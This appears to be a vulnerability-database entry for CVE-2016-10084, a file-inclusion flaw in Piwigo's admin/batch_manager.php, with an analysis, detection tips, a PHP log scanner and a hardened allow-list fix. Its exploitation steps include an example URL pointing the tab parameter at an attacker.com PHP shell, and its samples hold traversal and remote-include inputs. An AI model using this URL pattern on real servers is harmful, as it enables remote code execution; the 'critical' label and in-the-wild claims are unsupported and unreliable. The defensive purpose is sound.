CVE-2016-10084

Source: cve@mitre.org

MEDIUM
6.5
Published: December 30, 2016 at 07:59 AM
Modified: April 12, 2025 at 10:46 AM

Vulnerability Description

admin/batch_manager.php in Piwigo through 2.8.3 allows remote authenticated administrators to conduct File Inclusion attacks via the $page['tab'] variable (aka the mode parameter).

CVSS Metrics

Base Score
6.5
Severity
MEDIUM
Vector String
AV:N/AC:L/Au:S/C:P/I:P/A:P

Weaknesses (CWE)

Source: nvd@nist.gov

AI Security Analysis

01 // Technical Summary

Piwigo versions 2.8.3 and below are vulnerable to a critical File Inclusion vulnerability, allowing authenticated administrators to execute arbitrary PHP code. This flaw enables attackers to gain complete control over the web server, potentially leading to data breaches and system compromise.

02 // Vulnerability Mechanism

Step 1: Authentication. The attacker must first authenticate as an administrator within the Piwigo instance. This could be achieved through compromised credentials or other vulnerabilities.

Step 2: Payload Construction. The attacker crafts a malicious PHP file containing the desired payload (e.g., a web shell, reverse shell). This file is hosted on a server controlled by the attacker.

Step 3: Exploit Delivery. The attacker crafts a URL that exploits the vulnerability. The URL includes the admin/batch_manager.php script and sets the tab parameter to the URL of the attacker's malicious PHP file (e.g., http://target/piwigo/admin/batch_manager.php?tab=http://attacker.com/malicious.php).

Step 4: Code Execution. When the vulnerable script processes the request, it includes the attacker's PHP file using require_once. This executes the attacker's code on the server.

Step 5: Post-Exploitation. The attacker's code is executed, granting them control over the server, which can be used for further exploitation, such as data exfiltration or lateral movement.

03 // Deep Technical Analysis

The vulnerability stems from insufficient input validation within admin/batch_manager.php. The script copies the request's tab value into $page['tab'] and passes it to a require_once statement without checking it. The root cause is therefore missing input validation: $page['tab'] is never compared against the set of tabs the script actually supports, so an authenticated administrator can name an arbitrary file, which the server then includes and executes. The script's design assumes the tab parameter will always point to a legitimate file within the Piwigo directory structure, but it does not enforce this assumption.

04 // Exploitation Status

Public PoC is available. The vulnerability is easy to exploit once administrator credentials are held, and it has likely been actively exploited in the wild.

05 // Threat Intelligence

While no specific APT groups are directly linked to this CVE, the ease of exploitation makes it attractive to various threat actors. The impact is significant, and the vulnerability could be used as part of a larger attack chain.

CISA KEV: Not Listed

06 // Detection & Hunting

  • Monitor web server access logs for suspicious requests to admin/batch_manager.php with unusual tab (mode) parameter values (e.g., URLs pointing to external servers, path traversal sequences, or files outside the expected directory).

  • Analyze PHP error logs for errors related to file inclusion or execution of unexpected files.

  • Implement file integrity monitoring to detect changes to core Piwigo files or the creation of new files in unexpected locations.

  • Network traffic analysis: Look for outbound connections from the web server to suspicious IP addresses or domains, especially after a request to admin/batch_manager.php.
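The first two hunting bullets above can be turned into a small log scanner. The following PHP CLI script is an added example, not part of the original record or of Piwigo; it parses combined-format access log lines (the sample lines are constructed) and flags requests to admin/batch_manager.php whose mode or tab parameter is anything other than a plain tab name. The IP addresses, timestamps and hostnames are placeholders.

```php
<?php
// Added detection example (not Piwigo code). Requires PHP 8.0+ for
// str_contains()/str_ends_with(). Parses combined-format access log lines and
// reports batch_manager.php requests whose mode/tab value is not a plain name.
declare(strict_types=1);

// client, timestamp, method, request target, status code
const LOG_LINE_RE = '/^(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+) [^"]*" (\d{3})/';

/** Return a finding for a suspicious line, or null when the line is benign. */
function inspectLogLine(string $line): ?array
{
    if (!preg_match(LOG_LINE_RE, $line, $m)) {
        return null; // not a log line we understand
    }
    [, $client, $ts, $method, $target, $status] = $m;

    // Split the request target manually rather than trusting parse_url()
    // with a query string that itself contains "://".
    [$path, $query] = explode('?', $target, 2) + [1 => ''];
    if (!str_ends_with($path, 'admin/batch_manager.php')) {
        return null;
    }
    parse_str($query, $params); // percent-decodes values (%00 becomes "\0")

    $reasons = [];
    foreach (['mode', 'tab'] as $name) {
        if (!isset($params[$name]) || !is_string($params[$name])) {
            continue;
        }
        $value = $params[$name];
        if (preg_match('#^[a-z][a-z0-9+.\-]*://#i', $value)) {
            $reasons[] = "$name carries a URL scheme (remote include attempt)";
        }
        if (str_contains($value, '..') || str_contains($value, '/') || str_contains($value, '\\')) {
            $reasons[] = "$name carries a path component (traversal/local include)";
        }
        if (str_contains($value, "\0")) {
            $reasons[] = "$name carries a null byte";
        }
        // Catch-all: a legitimate tab is a short bare word such as "global".
        if (!preg_match('/^[a-z0-9_]{1,32}$/i', $value)) {
            $reasons[] = "$name is not a plain tab name";
        }
    }
    if ($reasons === []) {
        return null;
    }
    return [
        'client'  => $client,
        'time'    => $ts,
        'request' => "$method $target",
        'status'  => (int) $status,
        'reasons' => array_values(array_unique($reasons)),
    ];
}

// Constructed sample log lines (addresses/hosts are documentation placeholders).
$sampleLog = <<<'LOG'
192.0.2.10 - - [30/Dec/2016:07:59:01 +0000] "GET /piwigo/admin/batch_manager.php?mode=unit HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
192.0.2.11 - - [30/Dec/2016:08:00:15 +0000] "GET /piwigo/admin/batch_manager.php?mode=http://example.invalid/x.php HTTP/1.1" 500 120 "-" "curl/7.50.0"
192.0.2.12 - - [30/Dec/2016:08:01:02 +0000] "GET /piwigo/admin/batch_manager.php?tab=../../../../tmp/upload HTTP/1.1" 200 5120 "-" "curl/7.50.0"
192.0.2.13 - - [30/Dec/2016:08:02:30 +0000] "GET /piwigo/index.php?/category/3 HTTP/1.1" 200 9000 "-" "Mozilla/5.0"
LOG;

$lines = $argc > 1 ? file($argv[1], FILE_IGNORE_NEW_LINES) : explode("\n", $sampleLog);
foreach ($lines as $line) {
    $finding = inspectLogLine($line);
    if ($finding !== null) {
        printf("[%s] %s -> %s (HTTP %d): %s\n", $finding['time'], $finding['client'],
            $finding['request'], $finding['status'], implode('; ', $finding['reasons']));
    }
}
```

Run it as `php scan_batch_manager.php /var/log/apache2/access.log` to scan a real file, or without arguments to see the two constructed hostile lines flagged while the ordinary `mode=unit` and gallery requests pass. Because the check rejects anything that is not a bare word, it also catches encodings the scheme and traversal patterns alone would miss, which matters when correlating with the outbound-connection check in the last bullet.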

07 // Remediation & Hardening

  • Upgrade to Piwigo version 2.8.4 or later, which includes a fix for this vulnerability.

  • Implement strict input validation and sanitization for all user-supplied input, especially the tab parameter in admin/batch_manager.php. This should include whitelisting allowed file paths or using a secure include mechanism.

  • Restrict administrator access to the Piwigo admin panel to only trusted users and networks.

  • Regularly scan the web server for known vulnerabilities and misconfigurations.

  • Implement a Web Application Firewall (WAF) to filter malicious requests and prevent exploitation attempts.

  • Review and harden the PHP configuration. Set allow_url_include=Off (and keep allow_url_fopen restricted), which stops require_once from fetching a remote URL at all; and use disable_functions to disable dangerous functions such as system() if not required. Note that eval() is a language construct, not a function, so it cannot be disabled through disable_functions.
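To make the allow-list fix from the remediation list and the root-cause analysis in section 03 concrete, here is an added PHP example that is not Piwigo's own code: it reconstructs the unsafe pattern the CVE description implies (a request value spliced into a require_once path) next to a hardened version that maps the request onto a fixed set of tabs and also verifies the allow_url_include setting. The tab names "global" and "unit", the file naming scheme and the function names are assumptions made for illustration.

```php
<?php
// Added illustrative example (not Piwigo's code). The unsafe function exists
// only to show the pattern; a real application should contain only the safe one.
declare(strict_types=1);

// Assumed for illustration: the tabs the batch manager actually ships with.
const BATCH_MANAGER_TABS = ['global', 'unit'];

/** Unsafe pattern: whatever the client sent becomes part of the include path. */
function resolveTabUnsafe(array $get, string $root): string
{
    $tab = $get['mode'] ?? 'global';
    return $root . 'admin/batch_manager_' . $tab . '.php';
}

/**
 * Hardened pattern: the request value is only ever used as a key into a
 * fixed allow-list, so the resulting path is always one of two known files.
 * Unknown or non-string values throw instead of being silently included.
 */
function resolveTabSafe(array $get, string $root): string
{
    $tab = $get['mode'] ?? 'global';
    if (!is_string($tab) || !in_array($tab, BATCH_MANAGER_TABS, true)) {
        throw new InvalidArgumentException('unknown batch manager tab');
    }
    return $root . 'admin/batch_manager_' . $tab . '.php';
}

/** Defence in depth: true when PHP will refuse to include URLs at all. */
function remoteIncludesDisabled(): bool
{
    return filter_var(ini_get('allow_url_include'), FILTER_VALIDATE_BOOLEAN) === false;
}

// Demonstration with constructed inputs; the hostile values are placeholders.
$root = '/var/www/piwigo/';
$inputs = [
    'legitimate tab'        => ['mode' => 'unit'],
    'remote URL (constructed)' => ['mode' => 'http://example.invalid/x.php'],
    'traversal (constructed)'  => ['mode' => '../../../tmp/upload'],
    'array instead of string'  => ['mode' => ['x']],
    'no parameter'          => [],
];
foreach ($inputs as $label => $get) {
    echo "$label\n";
    try {
        // The unsafe resolver happily builds a path from anything string-like.
        $unsafe = is_string($get['mode'] ?? 'global') ? resolveTabUnsafe($get, $root) : '(type error)';
        echo "  unsafe -> $unsafe\n";
    } catch (Throwable $e) {
        echo "  unsafe -> error: {$e->getMessage()}\n";
    }
    try {
        echo "  safe   -> " . resolveTabSafe($get, $root) . "\n";
    } catch (InvalidArgumentException $e) {
        echo "  safe   -> rejected: {$e->getMessage()}\n";
    }
}
printf("allow_url_include disabled: %s\n", remoteIncludesDisabled() ? 'yes' : 'NO (remote includes possible)');
```

The important property of resolveTabSafe() is that the client never controls any character of the include path: the comparison uses a strict in_array() against a constant list, so even a value that happens to start with a valid tab name is rejected. The remoteIncludesDisabled() check is independent of the code fix and belongs in a deployment health check, since the Step 3 scenario in section 02 only works on hosts where allow_url_include is on.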

08 // Affected Products

Piwigo <= 2.8.3

09 // Discovered Proof of Concept Links
